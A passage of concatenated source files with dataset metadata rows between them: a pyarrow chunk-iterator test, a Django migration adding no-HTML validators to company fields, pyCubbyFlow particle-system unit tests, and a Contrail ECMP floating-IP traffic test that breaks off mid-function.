it = PyArrowChunkIterator()
for rb in reader:
it.add_record_batch(rb)
count = 0
while True:
try:
val = next(it)
assert val[0] == expected_data[int(count / 10)][0][count % 10]
assert val[1] == expected_data[int(count / 10)][1][count % 10]
count += 1
except StopIteration:
assert count == 100
break
@pytest.mark.skip(
reason="Cython is not enabled in build env")
def test_iterate_over_float_chunk():
stream = BytesIO()
field_foo = pyarrow.field("column_foo", pyarrow.float64(), True)
field_bar = pyarrow.field("column_bar", pyarrow.float64(), True)
schema = pyarrow.schema([field_foo, field_bar])
column_meta = [
("column_foo", "FLOAT", None, 0, 0, 0, 0),
("column_bar", "FLOAT", None, 0, 0, 0, 0)
]
column_size = 2
batch_row_count = 10
batch_count = 10
expected_data = []
writer = RecordBatchStreamWriter(stream, schema)
for i in range(batch_count):
column_arrays = []
py_arrays = []
for j in range(column_size):
column_data = []
for k in range(batch_row_count):
data = None if bool(random.getrandbits(1)) else random.uniform(-100.0, 100.0)
column_data.append(data)
column_arrays.append(column_data)
py_arrays.append(pyarrow.array(column_data))
expected_data.append(column_arrays)
rb = RecordBatch.from_arrays(py_arrays, ["column_foo", "column_bar"])
writer.write_batch(rb)
writer.close()
# seek stream to begnning so that we can read from stream
stream.seek(0)
reader = RecordBatchStreamReader(stream)
it = PyArrowChunkIterator()
for rb in reader:
it.add_record_batch(rb)
count = 0
while True:
try:
val = next(it)
assert val[0] == expected_data[int(count / 10)][0][count % 10]
assert val[1] == expected_data[int(count / 10)][1][count % 10]
count += 1
except StopIteration:
assert count == 100
break
| 31.188889
| 93
| 0.615248
| 707
| 5,614
| 4.710042
| 0.161245
| 0.010811
| 0.010811
| 0.012613
| 0.88018
| 0.88018
| 0.88018
| 0.856456
| 0.82042
| 0.82042
| 0
| 0.033153
| 0.27467
| 5,614
| 179
| 94
| 31.363128
| 0.784627
| 0.049697
| 0
| 0.794521
| 0
| 0
| 0.058194
| 0
| 0
| 0
| 0
| 0
| 0.061644
| 1
| 0.020548
| false
| 0.006849
| 0.061644
| 0
| 0.082192
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9092112316f4e097a11c9c44c18b31465adb4ef1
| 6,452
|
py
|
Python
|
company/migrations/0055_auto_20170809_1006.py
|
uktrade/directory-api
|
45a9024a7ecc2842895201cbb51420ba9e57a168
|
[
"MIT"
] | 2
|
2017-06-02T09:09:08.000Z
|
2021-01-18T10:26:53.000Z
|
company/migrations/0055_auto_20170809_1006.py
|
uktrade/directory-api
|
45a9024a7ecc2842895201cbb51420ba9e57a168
|
[
"MIT"
] | 629
|
2016-10-10T09:35:52.000Z
|
2022-03-25T15:04:04.000Z
|
company/migrations/0055_auto_20170809_1006.py
|
uktrade/directory-api
|
45a9024a7ecc2842895201cbb51420ba9e57a168
|
[
"MIT"
] | 5
|
2017-06-22T10:02:22.000Z
|
2022-03-14T17:55:21.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2017-08-09 10:06
from __future__ import unicode_literals
import directory_validators.string
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('company', '0054_auto_20170731_1054'),
]
operations = [
migrations.AlterField(
model_name='company',
name='address_line_1',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='address_line_2',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='country',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='description',
field=models.TextField(blank=True, default='', validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='email_full_name',
field=models.CharField(blank=True, default='', max_length=200, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='export_destinations_other',
field=models.CharField(blank=True, default='', help_text='Of the countries the project have not prioritised,which does the company want to export to (free text).', max_length=1000, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='keywords',
field=models.TextField(blank=True, default='', validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='locality',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='name',
field=models.CharField(max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='number',
field=models.CharField(max_length=8, unique=True, validators=[django.core.validators.RegexValidator(code='invalid_company_number', message='Company number must be 8 characters', regex='^[A-Za-z0-9]{8}$'), directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='po_box',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='postal_code',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='postal_full_name',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='summary',
field=models.CharField(blank=True, default='', max_length=250, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='description',
field=models.CharField(max_length=1000, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='image_one_caption',
field=models.CharField(blank=True, default='', max_length=200, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='image_three_caption',
field=models.CharField(blank=True, default='', max_length=200, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='image_two_caption',
field=models.CharField(blank=True, default='', max_length=200, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='keywords',
field=models.TextField(validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='short_summary',
field=models.CharField(blank=True, default='', max_length=200, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='testimonial',
field=models.CharField(blank=True, default='', max_length=1000, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='testimonial_company',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='testimonial_job_title',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='testimonial_name',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='title',
field=models.CharField(max_length=100, validators=[directory_validators.string.no_html]),
),
]
| 45.118881
| 255
| 0.632982
| 637
| 6,452
| 6.204082
| 0.167975
| 0.125
| 0.164474
| 0.183451
| 0.84919
| 0.815283
| 0.7958
| 0.7958
| 0.771002
| 0.756073
| 0
| 0.021757
| 0.244885
| 6,452
| 142
| 256
| 45.43662
| 0.789409
| 0.010539
| 0
| 0.711111
| 1
| 0.007407
| 0.123648
| 0.014261
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02963
| 0
| 0.051852
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
90dff925169df4343abe14a5ad634cd849959576
| 3,971
|
py
|
Python
|
Tests/PythonTests/ParticleSystemDataTests.py
|
utilForever/CubbyFlow-v1
|
d85c136d8eaa91ecce456c3356c7e578dda5d5bd
|
[
"MIT"
] | 3
|
2020-04-15T13:41:16.000Z
|
2020-12-29T11:23:59.000Z
|
Tests/PythonTests/ParticleSystemDataTests.py
|
utilForever/CubbyFlow-v1
|
d85c136d8eaa91ecce456c3356c7e578dda5d5bd
|
[
"MIT"
] | null | null | null |
Tests/PythonTests/ParticleSystemDataTests.py
|
utilForever/CubbyFlow-v1
|
d85c136d8eaa91ecce456c3356c7e578dda5d5bd
|
[
"MIT"
] | null | null | null |
import numpy as np
import pyCubbyFlow
import unittest
class ParticleSystemData2Tests(unittest.TestCase):
def testInit(self):
ps = pyCubbyFlow.ParticleSystemData2()
self.assertEqual(ps.numberOfParticles, 0)
ps2 = pyCubbyFlow.ParticleSystemData2(100)
self.assertEqual(ps2.numberOfParticles, 100)
def testResize(self):
ps = pyCubbyFlow.ParticleSystemData2()
ps.Resize(12)
self.assertEqual(ps.numberOfParticles, 12)
def testAddScalarData(self):
ps = pyCubbyFlow.ParticleSystemData2()
ps.Resize(12)
a0 = ps.AddScalarData(2.0)
a1 = ps.AddScalarData(9.0)
self.assertEqual(ps.numberOfParticles, 12)
self.assertEqual(a0, 0)
self.assertEqual(a1, 1)
as0 = np.array(ps.ScalarDataAt(a0))
for val in as0:
self.assertEqual(val, 2.0)
as1 = np.array(ps.ScalarDataAt(a1))
for val in as1:
self.assertEqual(val, 9.0)
def testAddVectorData(self):
ps = pyCubbyFlow.ParticleSystemData2()
ps.Resize(12)
a0 = ps.AddVectorData((2.0, 4.0))
a1 = ps.AddVectorData((9.0, -2.0))
self.assertEqual(ps.numberOfParticles, 12)
self.assertEqual(a0, 3)
self.assertEqual(a1, 4)
as0 = np.array(ps.VectorDataAt(a0))
for val in as0:
self.assertEqual(val.tolist(), [2.0, 4.0])
as1 = np.array(ps.VectorDataAt(a1))
for val in as1:
self.assertEqual(val.tolist(), [9.0, -2.0])
def testAddParticles(self):
ps = pyCubbyFlow.ParticleSystemData2()
ps.Resize(12)
ps.AddParticles([(1.0, 2.0), (4.0, 5.0)],
[(7.0, 8.0), (8.0, 7.0)],
[(5.0, 4.0), (2.0, 1.0)])
self.assertEqual(ps.numberOfParticles, 14)
p = np.array(ps.positions)
v = np.array(ps.velocities)
f = np.array(ps.forces)
self.assertEqual([1.0, 2.0], p[12].tolist())
self.assertEqual([4.0, 5.0], p[13].tolist())
self.assertEqual([7.0, 8.0], v[12].tolist())
self.assertEqual([8.0, 7.0], v[13].tolist())
self.assertEqual([5.0, 4.0], f[12].tolist())
self.assertEqual([2.0, 1.0], f[13].tolist())
class ParticleSystemData3Tests(unittest.TestCase):
def testInit(self):
ps = pyCubbyFlow.ParticleSystemData3()
self.assertEqual(ps.numberOfParticles, 0)
ps2 = pyCubbyFlow.ParticleSystemData3(100)
self.assertEqual(ps2.numberOfParticles, 100)
def testResize(self):
ps = pyCubbyFlow.ParticleSystemData3()
ps.Resize(12)
self.assertEqual(ps.numberOfParticles, 12)
def testAddScalarData(self):
ps = pyCubbyFlow.ParticleSystemData3()
ps.Resize(12)
a0 = ps.AddScalarData(2.0)
a1 = ps.AddScalarData(9.0)
self.assertEqual(ps.numberOfParticles, 12)
self.assertEqual(a0, 0)
self.assertEqual(a1, 1)
as0 = np.array(ps.ScalarDataAt(a0))
for val in as0:
self.assertEqual(val, 2.0)
as1 = np.array(ps.ScalarDataAt(a1))
for val in as1:
self.assertEqual(val, 9.0)
def testAddVectorData(self):
ps = pyCubbyFlow.ParticleSystemData3()
ps.Resize(12)
a0 = ps.AddVectorData((2.0, 4.0, -1.0))
a1 = ps.AddVectorData((9.0, -2.0, 5.0))
self.assertEqual(ps.numberOfParticles, 12)
self.assertEqual(a0, 3)
self.assertEqual(a1, 4)
as0 = np.array(ps.VectorDataAt(a0))
for val in as0:
self.assertEqual(val.tolist(), [2.0, 4.0, -1.0])
as1 = np.array(ps.VectorDataAt(a1))
for val in as1:
self.assertEqual(val.tolist(), [9.0, -2.0, 5.0])
def testAddParticles(self):
ps = pyCubbyFlow.ParticleSystemData3()
ps.Resize(12)
ps.AddParticles([(1.0, 2.0, 3.0), (4.0, 5.0, 6.0)],
[(7.0, 8.0, 9.0), (8.0, 7.0, 6.0)],
[(5.0, 4.0, 3.0), (2.0, 1.0, 3.0)])
self.assertEqual(ps.numberOfParticles, 14)
p = np.array(ps.positions)
v = np.array(ps.velocities)
f = np.array(ps.forces)
self.assertEqual([1.0, 2.0, 3.0], p[12].tolist())
self.assertEqual([4.0, 5.0, 6.0], p[13].tolist())
self.assertEqual([7.0, 8.0, 9.0], v[12].tolist())
self.assertEqual([8.0, 7.0, 6.0], v[13].tolist())
self.assertEqual([5.0, 4.0, 3.0], f[12].tolist())
self.assertEqual([2.0, 1.0, 3.0], f[13].tolist())
def main():
pyCubbyFlow.Logging.mute()
unittest.main()
if __name__ == '__main__':
main()
| 26.831081
| 53
| 0.669101
| 613
| 3,971
| 4.32137
| 0.102773
| 0.226501
| 0.047565
| 0.12835
| 0.904492
| 0.89732
| 0.866742
| 0.755002
| 0.739147
| 0.689317
| 0
| 0.09209
| 0.146814
| 3,971
| 148
| 54
| 26.831081
| 0.689787
| 0
| 0
| 0.672414
| 0
| 0
| 0.002014
| 0
| 0
| 0
| 0
| 0
| 0.344828
| 1
| 0.094828
| false
| 0
| 0.025862
| 0
| 0.137931
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
295c11c9c932dc89ac21c44ea60e8c3b53b416bc
| 88,087
|
py
|
Python
|
scripts/ecmp/sanity.py
|
vkolli/5.0_contrail-test
|
1793f169a94100400a1b2fafbad21daf5aa4d48a
|
[
"Apache-2.0"
] | null | null | null |
scripts/ecmp/sanity.py
|
vkolli/5.0_contrail-test
|
1793f169a94100400a1b2fafbad21daf5aa4d48a
|
[
"Apache-2.0"
] | 1
|
2021-06-01T22:18:29.000Z
|
2021-06-01T22:18:29.000Z
|
scripts/ecmp/sanity.py
|
lmadhusudhanan/contrail-test
|
bd39ff19da06a20bd79af8c25e3cde07375577cf
|
[
"Apache-2.0"
] | null | null | null |
# Need to import path to test/fixtures and test/scripts/
# Ex : export PYTHONPATH='$PATH:/root/test/fixtures/:/root/test/scripts/'
#
# To run tests, you can do 'python -m testtools.run tests'. To run specific tests,
# You can do 'python -m testtools.run -l tests'
# Set the env variable PARAMS_FILE to point to your ini file. Else it will
# try to pick params.ini in PWD
import sys
import os
from common.openstack_libs import nova_client as mynovaclient
from common.openstack_libs import nova_exception as novaException
import unittest
import fixtures
import testtools
import traceback
import traffic_tests
from common.contrail_test_init import ContrailTestInit
from vn_test import *
from floating_ip import *
from quantum_test import *
from vnc_api_test import *
from nova_test import *
from vm_test import *
from common.connections import ContrailConnections
from contrail_fixtures import *
from tcutils.wrappers import preposttest_wrapper
sys.path.append(os.path.realpath('tcutils/pkgs/Traffic'))
from traffic.core.stream import Stream
from traffic.core.profile import create, ContinuousProfile
from traffic.core.helpers import Host
from traffic.core.helpers import Sender, Receiver
from testresources import ResourcedTestCase
from ecmp_test_resource import ECMPSolnSetupResource
class TestECMP(testtools.TestCase, ResourcedTestCase, fixtures.TestWithFixtures):
resources = [('base_setup', ECMPSolnSetupResource)]
def __init__(self, *args, **kwargs):
testtools.TestCase.__init__(self, *args, **kwargs)
self.res = ECMPSolnSetupResource.getResource()
self.inputs = self.res.inputs
self.connections = self.res.connections
self.quantum_h = self.connections.quantum_h
self.nova_h = self.connections.nova_h
self.vnc_lib = self.connections.vnc_lib
self.logger = self.res.logger
self.agent_inspect = self.connections.agent_inspect
self.cn_inspect = self.connections.cn_inspect
self.api_s_inspect = self.connections.api_server_inspect
self.analytics_obj = self.connections.analytics_obj
self.agent_vn_obj = {}
def __del__(self):
print "Deleting test_with_setup now"
ECMPSolnSetupResource.finishedWith(self.res)
def setUp(self):
super(TestECMP, self).setUp()
if 'TEST_CONFIG_FILE' in os.environ:
self.input_file = os.environ.get('TEST_CONFIG_FILE')
else:
self.input_file = 'params.ini'
def tearDown(self):
print "Tearing down test"
super(TestECMP, self).tearDown()
ECMPSolnSetupResource.finishedWith(self.res)
def runTest(self):
pass
# end runTest
@preposttest_wrapper
def test_ecmp_to_non_ecmp_bw_three_vms_same_fip(self):
'''Test communication between three VMs who have borrowed the FIP from common FIP pool.Delete two of the VMs and check that traffic flow is unaffected.
'''
result = True
self.fip_pool_name = self.res.fip_pool_name
fvn = self.res.fvn
vn1 = self.res.vn1
vn2 = self.res.vn2
vn3 = self.res.vn3
my_fip = self.res.my_fip
agent_tap_intf_list = {}
tap_intf_list = []
a_list = []
dport1 = self.res.dport1
dport2 = self.res.dport2
dport3 = self.res.dport3
udp_src = self.res.udp_src
vm1 = self.res.vm1
vm2 = self.res.vm2
vm3 = self.res.vm3
fvn_vm1 = self.res.fvn_vm1
vm_node_ips = []
vm_node_ips.append(vm1.vm_node_ip)
if (vm1.vm_node_ip != vm2.vm_node_ip):
vm_node_ips.append(vm2.vm_node_ip)
if (vm1.vm_node_ip != vm3.vm_node_ip):
vm_node_ips.append(vm3.vm_node_ip)
self.logger.info("-" * 80)
self.logger.info('Starting TCP Traffic from fvn_vm1 to 30.1.1.3')
self.logger.info("-" * 80)
vm_list = []
vm_list = [vm1, vm2, vm3]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream2 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport2)
stream3 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport3)
stream_list = [stream1, stream2, stream3]
tx_vm_node_ip = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvn_vm1.vm_obj)]['host_ip']
tx_local_host = Host(
tx_vm_node_ip,
self.inputs.host_data[tx_vm_node_ip]['username'],
self.inputs.host_data[tx_vm_node_ip]['password'])
send_host = Host(fvn_vm1.local_ip, fvn_vm1.vm_username,
fvn_vm1.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
sender[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
send_filename = 'sendtcp_%s' % count
recv_filename = 'recvtcp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
sender[stream][vm] = Sender(
send_filename, profile[stream][vm], tx_local_host, send_host, self.inputs.logger)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
sender[stream][vm].start()
self.logger.info('Sending traffic for 10 seconds')
time.sleep(10)
self.logger.info(
'Will disassociate the fip address from two VMs and check that there should be no traffic loss.')
self.res.fip_obj.del_virtual_machine_interface(self.res.vm1_intf)
self.res.vnc_lib.floating_ip_update(self.res.fip_obj)
self.res.fip_obj.del_virtual_machine_interface(self.res.vm3_intf)
self.res.vnc_lib.floating_ip_update(self.res.fip_obj)
self.logger.info('Get the Route Entry in the control node')
for vm_node_ip in vm_node_ips:
active_controller = None
inspect_h1 = self.agent_inspect[vm_node_ip]
agent_xmpp_status = inspect_h1.get_vna_xmpp_connection_status()
for entry in agent_xmpp_status:
if entry['cfg_controller'] == 'Yes':
active_controller = entry['controller_ip']
self.logger.info(
'Active control node from the Agent %s is %s' %
(vm_node_ip, active_controller))
sleep(5)
route_entry = self.cn_inspect[active_controller].get_cn_route_table_entry(
ri_name=self.res.fvn_ri_name, prefix='30.1.1.3/32')
self.logger.info('Route_entry in the control node is %s' % route_entry)
result = True
if route_entry:
self.logger.info(
'Route Entry found in the Active Control-Node %s' %
(active_controller))
else:
result = False
assert result, 'Route Entry not found in the Active Control-Node %s' % (
active_controller)
self.logger.info(
'Get the FIP list and verify the vrf_name and address in the VMI')
fip_addr_vm1 = self.res.vm1.chk_vmi_for_fip(self.res.vn1_fq_name)
fip_addr_vm2 = self.res.vm2.chk_vmi_for_fip(self.res.vn2_fq_name)
fip_addr_vm3 = self.res.vm3.chk_vmi_for_fip(self.res.vn3_fq_name)
fip_vrf_entry_vm1 = self.res.vm1.chk_vmi_for_vrf_entry(
self.res.vn1_fq_name)
fip_vrf_entry_vm2 = self.res.vm2.chk_vmi_for_vrf_entry(
self.res.vn2_fq_name)
fip_vrf_entry_vm3 = self.res.vm3.chk_vmi_for_vrf_entry(
self.res.vn3_fq_name)
self.logger.info(
'The vrf_entry on the VMI of %s is %s, on %s is %s and on %s is %s' %
(self.res.vm1.vm_name, fip_vrf_entry_vm1, self.res.vm2.vm_name, fip_vrf_entry_vm2, self.res.vm3.vm_name, fip_vrf_entry_vm3))
if ((fip_vrf_entry_vm2 == self.res.fvn_vrf_name) and all(x == None for x in (fip_vrf_entry_vm1, fip_vrf_entry_vm3))):
self.logger.info('Correct FIP VRF Entries seen ')
else:
result = False
assert result, 'Incorrect FIP VRF Entries seen'
self.logger.info(
'The FIP address assigned to %s is %s, to %s is %s and to %s is %s' %
(vm1.vm_name, fip_addr_vm1, vm2.vm_name, fip_addr_vm2, vm3.vm_name, fip_addr_vm3))
if ((fip_addr_vm2 == my_fip) and all(x == None for x in (fip_addr_vm1, fip_addr_vm3))):
self.logger.info('FIP Address assigned correctly ')
else:
result = False
assert result, 'FIP Address assignment incorrect'
for stream in stream_list:
for vm in vm_list:
sender[stream][vm].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
stream_sent_count = {}
stream_recv_count = {}
result = True
for stream in stream_list:
stream_sent_count[stream] = 0
stream_recv_count[stream] = 0
for vm in vm_list:
stream_sent_count[stream] = stream_sent_count[stream] + \
sender[stream][vm].sent
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
if abs(stream_recv_count[stream] - stream_sent_count[stream]) < 5:
self.logger.info(
'%s packets sent and %s packets received in Stream after disassociating ' %
(stream_sent_count[stream], stream_recv_count[stream]))
else:
result = False
assert result, '%s packets sent and %s packets received in Stream' % (
stream_sent_count[stream], stream_recv_count[stream])
return True
# end test_ecmp_to_non_ecmp_bw_three_vms_same_fip
@preposttest_wrapper
def test_ecmp_bw_three_vms_same_fip_delete_add_fip(self):
'''Test communication between three VMs who have borrowed the FIP from common FIP pool.Delete one of the VM and check that ECMP hold good. Add a VM later and check that ECMP continues between the three VMs
'''
result = True
self.fip_pool_name = self.res.fip_pool_name
fvn = self.res.fvn
vn1 = self.res.vn1
vn2 = self.res.vn2
vn3 = self.res.vn3
my_fip = self.res.my_fip
agent_tap_intf_list = {}
tap_intf_list = []
a_list = []
dport1 = self.res.dport1
dport2 = self.res.dport2
dport3 = self.res.dport3
udp_src = self.res.udp_src
vm1 = self.res.vm1
vm2 = self.res.vm2
vm3 = self.res.vm3
fvn_vm1 = self.res.fvn_vm1
(domain, project, vn2) = self.res.vn2_fq_name.split(':')
(domain, project, fvn) = self.res.fvn_fq_name.split(':')
(domain, project, vn1) = self.res.vn1_fq_name.split(':')
(domain, project, vn3) = self.res.vn3_fq_name.split(':')
vm_node_ips = []
vm_node_ips.append(vm1.vm_node_ip)
if (vm1.vm_node_ip != vm2.vm_node_ip):
vm_node_ips.append(vm2.vm_node_ip)
if (vm1.vm_node_ip != vm3.vm_node_ip):
vm_node_ips.append(vm3.vm_node_ip)
self.logger.info("-" * 80)
self.logger.info('Starting TCP Traffic from fvn_vm1 to 30.1.1.3')
self.logger.info("-" * 80)
vm_list = []
vm_list = [vm1, vm2, vm3]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream2 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport2)
stream3 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport3)
stream_list = [stream1, stream2, stream3]
tx_vm_node_ip = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvn_vm1.vm_obj)]['host_ip']
tx_local_host = Host(
tx_vm_node_ip,
self.inputs.host_data[tx_vm_node_ip]['username'],
self.inputs.host_data[tx_vm_node_ip]['password'])
send_host = Host(fvn_vm1.local_ip, fvn_vm1.vm_username,
fvn_vm1.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
sender[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
send_filename = 'sendtcp_%s' % count
recv_filename = 'recvtcp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
sender[stream][vm] = Sender(
send_filename, profile[stream][vm], tx_local_host, send_host, self.inputs.logger)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
sender[stream][vm].start()
self.logger.info('Sending traffic for 10 seconds')
time.sleep(10)
self.logger.info(
'Will disassociate the fip address from one of the VMs and check if ECMP still exists between the other two')
self.logger.info('There should be no packet loss')
self.res.fip_obj.del_virtual_machine_interface(self.res.vm1_intf)
self.res.vnc_lib.floating_ip_update(self.res.fip_obj)
self.logger.info('Get the Route Entry in the control node')
for vm_node_ip in vm_node_ips:
active_controller = None
inspect_h1 = self.agent_inspect[vm_node_ip]
agent_xmpp_status = inspect_h1.get_vna_xmpp_connection_status()
for entry in agent_xmpp_status:
if entry['cfg_controller'] == 'Yes':
active_controller = entry['controller_ip']
self.logger.info(
'Active control node from the Agent %s is %s' %
(vm_node_ip, active_controller))
sleep(5)
route_entry = self.cn_inspect[active_controller].get_cn_route_table_entry(
ri_name=self.res.fvn_ri_name, prefix='30.1.1.3/32')
self.logger.info('Route_entry in the control node is %s' % route_entry)
result = True
if route_entry:
self.logger.info(
'Route Entry found in the Active Control-Node %s' %
(active_controller))
else:
result = False
assert result, 'Route Entry not found in the Active Control-Node %s' % (
active_controller)
self.logger.info(
'Get the FIP list and verify the vrf_name and address in the VMI')
fip_addr_vm1 = self.res.vm1.chk_vmi_for_fip(self.res.vn1_fq_name)
fip_addr_vm2 = self.res.vm2.chk_vmi_for_fip(self.res.vn2_fq_name)
fip_addr_vm3 = self.res.vm3.chk_vmi_for_fip(self.res.vn3_fq_name)
fip_vrf_entry_vm1 = self.res.vm1.chk_vmi_for_vrf_entry(
self.res.vn1_fq_name)
fip_vrf_entry_vm2 = self.res.vm2.chk_vmi_for_vrf_entry(
self.res.vn2_fq_name)
fip_vrf_entry_vm3 = self.res.vm3.chk_vmi_for_vrf_entry(
self.res.vn3_fq_name)
self.logger.info(
'The vrf_entry on the VMI of %s is %s, on %s is %s and on %s is %s' %
(self.res.vm1.vm_name, fip_vrf_entry_vm1, self.res.vm2.vm_name, fip_vrf_entry_vm2, self.res.vm3.vm_name, fip_vrf_entry_vm3))
if ((fip_vrf_entry_vm1 == None) and all(x == self.res.fvn_vrf_name for x in (fip_vrf_entry_vm2, fip_vrf_entry_vm3))):
self.logger.info('Correct FIP VRF Entries seen ')
else:
result = False
assert result, 'Incorrect FIP VRF Entries seen'
self.logger.info(
'The FIP address assigned to %s is %s, to %s is %s and to %s is %s' %
(vm1.vm_name, fip_addr_vm1, vm2.vm_name, fip_addr_vm2, vm3.vm_name, fip_addr_vm3))
if ((fip_addr_vm1 == None) and all(x == my_fip for x in (fip_addr_vm2, fip_addr_vm3))):
self.logger.info('FIP Address assigned correctly ')
else:
result = False
assert result, 'FIP Address assignment incorrect'
self.logger.info('Check for the FIP route entry')
for vm_node_ip in vm_node_ips:
tap_intf_list = []
inspect_h9 = self.agent_inspect[vm_node_ip]
agent_vrf_objs = inspect_h9.get_vna_vrf_objs(domain, project, fvn)
agent_vrf_obj = self.get_matching_vrf(
agent_vrf_objs['vrf_list'], self.res.fvn_vrf_name)
fvn_vrf_id9 = agent_vrf_obj['ucindex']
paths = inspect_h9.get_vna_active_route(
vrf_id=fvn_vrf_id9, ip=self.res.my_fip, prefix='32')['path_list']
self.logger.info('There are %s nexthops to %s on Agent %s' %
(len(paths), self.res.my_fip, vm_node_ip))
next_hops = inspect_h9.get_vna_active_route(
vrf_id=fvn_vrf_id9, ip=self.res.my_fip, prefix='32')['path_list'][0]['nh']['mc_list']
if not next_hops:
result = False
assert result, 'Route not found in the Agent %s' % vm_node_ip
else:
self.logger.info('Route found in the Agent %s' % vm_node_ip)
for nh in next_hops:
label = nh['label']
if nh['type'] == 'Tunnel':
destn_agent = nh['dip']
inspect_hh = self.agent_inspect[destn_agent]
agent_vrf_objs = inspect_hh.get_vna_vrf_objs(
domain, project, fvn)
